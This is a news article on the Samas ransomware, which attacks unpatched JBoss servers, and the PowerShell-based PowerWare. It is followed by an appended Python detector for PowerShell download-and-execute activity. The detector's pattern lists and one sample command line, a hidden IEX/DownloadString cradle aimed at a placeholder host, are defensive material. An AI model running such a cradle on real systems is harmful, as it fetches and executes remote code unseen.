Security researchers warn of server-attacking ransomware

New strain of ransomware said to be distributed by compromising servers and using them to move through networks to encrypt and hold multiple data sets to ransom

As a growing number of US hospitals report ransomware attacks, researchers are warning of a new strain of ransomware targeting the healthcare sector that attacks servers in order to lock up entire networks.

Unlike most other malware that encrypts data and demands ransom for its release, the Samas strain of ransomware does not rely on user-focused attack vectors such as phishing emails.

Instead, Samas – also known as Samsam and MSIL.B/C – is distributed by compromising servers and using them to move laterally through networks to encrypt and hold multiple data sets to ransom.

Samas compromises servers by exploiting known vulnerabilities in unpatched versions of the JBoss application server, which the attackers identify using the Jexboss open-source network-scanning tool.

Samas then encrypts hundreds of different file types with the Rijndael algorithm and encrypts the Rijndael key itself with 2048-bit RSA, according to Nick Biasini, security researcher at Cisco Talos.

“This makes the files unrecoverable unless the author made a mistake in the implementation of the encryption algorithms,” he wrote in a blog post.

Samas is also unusual in that once it is installed, it is self-sufficient and there is no communication with command and control servers, making it harder to detect.

The FBI is asking US businesses and software security experts for emergency help in its investigation of Samas, reports Reuters.

In a confidential advisory obtained by Reuters, the FBI provided a list of technical indicators to help companies determine if they were victims of Samas and to enable network defence activities to reduce the risk of similar attacks in future.

However, like most other forms of ransomware, Samas demands payment in bitcoin and in some cases has offered payment options for multiple files, according to Biasini.

During the Cisco Talos investigation, he said researchers found multiple bitcoin wallets being presented to users containing a total of around 275 bitcoins worth about $115,000.

Biasini believes ransomware will continue to be a threat to the internet until attackers find a more profitable technique.

“Protection against such threats is best achieved using a multi-tier defence architecture to ensure potential threats are scanned multiple times,” he said. “However, one of the most effective ways to protect yourself is by simply backing up valuable files.”

According to Biasini, targeted organisations often find that when backups are most needed, they are either non-existent or incomplete.

“These lapses provide the revenue stream that is currently fuelling the development of ransomware,” he said.

Ransomware is one of the top international cyber threats, along with distributed denial of service (DDoS) attacks and bullet-proof hosting services, according to the UK National Crime Agency.

Research has shown that relatively low-cost ransomware attacks typically net thousands of pounds a week for attackers.

Warnings about Samas ransomware coincide with similar warnings by Carbon Black about ransomware created using Microsoft’s PowerShell scripting language for system administration.

Dubbed “PowerWare”, the ransomware is also being used to target organisations in the healthcare sector, as well as other enterprises.

By using PowerShell to retrieve and execute the malicious code, the ransomware can avoid writing new files to disk and blend in with legitimate activity, making it much harder to detect.
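As an added example (not code from the article, Cisco Talos or Carbon Black), the check below flags process command lines that combine network retrieval with in-memory execution, which is the PowerShell behaviour described above; the pattern lists and sample command lines are constructed for illustration and are not indicators from any advisory.

```python
"""Flag PowerShell command lines that fetch code over the network and run it
without writing a file. Pattern lists and samples are constructed assumptions."""
import re
from dataclasses import dataclass, field

# Stage 1: primitives that retrieve content over the network.
DOWNLOAD = re.compile(
    r"net\.webclient|downloadstring|downloaddata|invoke-webrequest|\biwr\b"
    r"|invoke-restmethod|\birm\b|start-bitstransfer", re.IGNORECASE)
# Stage 2: primitives that execute a string or bytes held only in memory.
EXECUTE = re.compile(
    r"invoke-expression|\biex\b|\[scriptblock\]::create"
    r"|\[reflection\.assembly\]::load", re.IGNORECASE)
# Switches that reduce visibility; noted but not sufficient on their own.
EVASION = re.compile(
    r"-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-ep\s+bypass"
    r"|-executionpolicy\s+bypass|-noni\b|-encodedcommand|\s-e(nc|c)?\b",
    re.IGNORECASE)

@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)

def assess_powershell(cmdline: str) -> Verdict:
    """Suspicious only when retrieval and in-memory execution co-occur;
    evasion switches alone are common in legitimate administration."""
    reasons = []
    if DOWNLOAD.search(cmdline):
        reasons.append("network retrieval")
    if EXECUTE.search(cmdline):
        reasons.append("in-memory execution")
    if EVASION.search(cmdline):
        reasons.append("visibility-reducing switches")
    both = "network retrieval" in reasons and "in-memory execution" in reasons
    return Verdict(both, reasons)

def flagged(cmdlines):
    """Return the subset of command lines judged suspicious."""
    return [c for c in cmdlines if assess_powershell(c).suspicious]

# Constructed sample process command lines (not real telemetry).
SAMPLES = [
    "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x')",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "powershell.exe Get-ChildItem C:\\Users | Export-Csv users.csv",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess_powershell(line), line[:60])
```

Feed it the command-line field from process-creation or PowerShell script-block logs; the verdict keeps the evasion switches as context rather than treating them as proof on their own.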